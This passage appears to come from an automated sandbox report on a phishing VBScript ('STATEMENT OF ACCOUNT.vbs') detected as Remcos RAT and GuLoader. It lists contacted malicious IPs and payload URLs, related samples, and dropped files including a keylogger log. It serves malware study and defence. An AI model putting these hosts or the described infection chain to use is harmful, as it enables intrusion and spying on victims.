                http://103.237.86.247/Udmpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.2powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.24powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Udmagretpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Udmagret.powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=bingaotbhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/Udmagret.hhpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=bingrmsbhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.google.com/accounts/serviceloginwab.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore68powershell.exe, 00000001.00000002.2293994256.0000026CD65D1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.23powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.ebuddy.comwab.exe, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                178.237.33.50
                		geoplugin.netNetherlands
                		8455ATOM86-ASATOM86NLfalse
                103.237.87.159
                		unknownunknown
                		133587BGNR-AP2BainandCompanySGtrue
                103.237.86.247
                		unknownunknown
                		133587BGNR-AP2BainandCompanySGfalse

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1465957
                Start date and time:2024-07-02 10:26:05 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 45s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:STATEMENT OF ACCOUNT.vbs
                Detection:MAL
                Classification:mal100.phis.troj.spyw.expl.evad.winVBS@26/15@1/3
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 168
                • Number of non-executed functions: 286
                Cookbook Comments:
                • Found application associated with file extension: .vbs

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 93.184.221.240
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 5352 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 7372 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                04:26:59API Interceptor1x Sleep call for process: wscript.exe modified
                04:27:01API Interceptor128x Sleep call for process: powershell.exe modified
                04:28:23API Interceptor472567x Sleep call for process: wab.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                178.237.33.50710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                • geoplugin.net/json.gp
                SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • geoplugin.net/json.gp
                Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • geoplugin.net/json.gp
                SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • geoplugin.net/json.gp
                Vyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • geoplugin.net/json.gp
                6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • geoplugin.net/json.gp
                tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                • geoplugin.net/json.gp
                TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • geoplugin.net/json.gp
                103.237.87.159Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  103.237.86.247SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247/mbLXhRfFSSN77.bin
                  Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247/nsQUkTChtPKgp70.bin
                  SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247/qOreedem137.bin
                  Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247/YckNurPLCcwPGiweiCyGTJ2.bin
                  Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247/JrFdfe171.bin

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  geoplugin.net710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                  • 178.237.33.50
                  SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  Vyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                  • 178.237.33.50
                  tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                  • 178.237.33.50
                  TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                  • 178.237.33.50

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  BGNR-AP2BainandCompanySGSOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.87.32
                  Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  YHZb2CeJdY.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  lVlJfRiCLE.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  TKX7tZs372.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  3B3W5byB4W.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  jkeqHGu4is.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  BGNR-AP2BainandCompanySGSOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.87.32
                  Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 103.237.86.247
                  YHZb2CeJdY.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  lVlJfRiCLE.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  TKX7tZs372.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  3B3W5byB4W.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  jkeqHGu4is.elfGet hashmaliciousMirai, OkiruBrowse
                  • 103.237.87.90
                  ATOM86-ASATOM86NL710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                  • 178.237.33.50
                  SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  Vyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                  • 178.237.33.50
                  tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                  • 178.237.33.50
                  TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                  • 178.237.33.50

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\remcos\logs.dat

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):144
                  Entropy (8bit):3.356983879725943
                  Encrypted:false
                  SSDEEP:3:rhlKlVHrYLcl5JWRal2Jl+7R0DAlBG45klovDl6v:6lVs45YcIeeDAlOWAv
                  MD5:A6F78E3DE460830CAD017D79D29ECA49
                  SHA1:0586EFC6F224C0A71F2ADC7DBDE5CBC28E17D745
                  SHA-256:9C392FBACD3139EB660AD7C1FCE61B1048F6883683415497C861A1FADF391409
                  SHA-512:3775C88B7208E1210FC328DCC1EEA34D2BA878C5362E3643612797E158A0C89093E27822102745CA900DB3CE635634F273D8958620D218E8C3F6004F4E3A1A23
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                  Preview:....[.2.0.2.4./.0.7./.0.2. .0.4.:.2.7.:.5.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                  Download File
                  Process:C:\Windows\System32\wscript.exe
                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                  Category:dropped
                  Size (bytes):71954
                  Entropy (8bit):7.996617769952133
                  Encrypted:true
                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                  Malicious:false
                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                  Download File
                  Process:C:\Windows\System32\wscript.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):328
                  Entropy (8bit):3.1196963549884558
                  Encrypted:false
                  SSDEEP:6:kKU99UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:8kDnLNkPlE99SNxAhUe/3
                  MD5:BEA69D4A4DA63A363C02F20838911FB1
                  SHA1:E045CEDB7191A7702BDD572F10CE90D4BEDD97AA
                  SHA-256:83EF388C16303C52675240C20DEDDFD03D92AB84F6C60003A5F54BDF613B3CAF
                  SHA-512:6F9D05D9CB5BE914BD3BB8B68A2DA270C36B2584D2C60712995E9646BC93DEBC265A8795A921B15FA2B56A9D0F65B7D363DF05323FD89AE78B8534270103C739
                  Malicious:false
                  Preview:p...... ........ ...Y...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):962
                  Entropy (8bit):5.013811273052389
                  Encrypted:false
                  SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                  MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                  SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                  SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                  SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                  Malicious:false
                  Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):11608
                  Entropy (8bit):4.8908305915084105
                  Encrypted:false
                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                  MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                  SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                  SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                  SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                  Malicious:false
                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):1.1940658735648508
                  Encrypted:false
                  SSDEEP:3:Nlllul3nqth:NllUa
                  MD5:851531B4FD612B0BC7891B3F401A478F
                  SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                  SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                  SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                  Malicious:false
                  Preview:@...e.................................&..............@..........

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asrbhln5.pt5.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fjp4vb4n.fhi.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nggbinth.znm.psm1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqjjre0d.eq3.ps1

                  Download File
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\bhv3B88.tmp

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x97b8c478, page size 32768, DirtyShutdown, Windows version 10.0
                  Category:dropped
                  Size (bytes):20447232
                  Entropy (8bit):1.282724092026394
                  Encrypted:false
                  SSDEEP:12288:iiokyOs87IKSOfvKD52x+2e5cjzFTH/EREF:FZsJTDM+
                  MD5:2B2682BCD0C16B506F841405FB609FDF
                  SHA1:D951E12BBE8F6B5D4F467FD3F5A37D96175EF629
                  SHA-256:6CB03DA76AB944092369190459AB85078C1CF9C995783D3423A433CB8751A0FC
                  SHA-512:8CAEA02B5CFD74F1F40C43720B098D012923BB7BC105E37A9ED1DF41F31BC41F87AAD09D5B82B96E3E0A72FB0F18C7E2EEC3CD874D9F29A77A3A644E609D5FB2
                  Malicious:false
                  Preview:...x... ........=......J}...0...{........................"..........{.......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;.................................p.e......{...................-......{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\bhv5123.tmp

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x97b8c478, page size 32768, DirtyShutdown, Windows version 10.0
                  Category:dropped
                  Size (bytes):20447232
                  Entropy (8bit):1.282724092026394
                  Encrypted:false
                  SSDEEP:12288:iiokyOs87IKSOfvKD52x+2e5cjzFTH/EREF:FZsJTDM+
                  MD5:2B2682BCD0C16B506F841405FB609FDF
                  SHA1:D951E12BBE8F6B5D4F467FD3F5A37D96175EF629
                  SHA-256:6CB03DA76AB944092369190459AB85078C1CF9C995783D3423A433CB8751A0FC
                  SHA-512:8CAEA02B5CFD74F1F40C43720B098D012923BB7BC105E37A9ED1DF41F31BC41F87AAD09D5B82B96E3E0A72FB0F18C7E2EEC3CD874D9F29A77A3A644E609D5FB2
                  Malicious:false
                  Preview:...x... ........=......J}...0...{........................"..........{.......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;.................................p.e......{...................-......{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw

                  Download File
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                  Category:dropped
                  Size (bytes):2
                  Entropy (8bit):1.0
                  Encrypted:false
                  SSDEEP:3:Qn:Qn
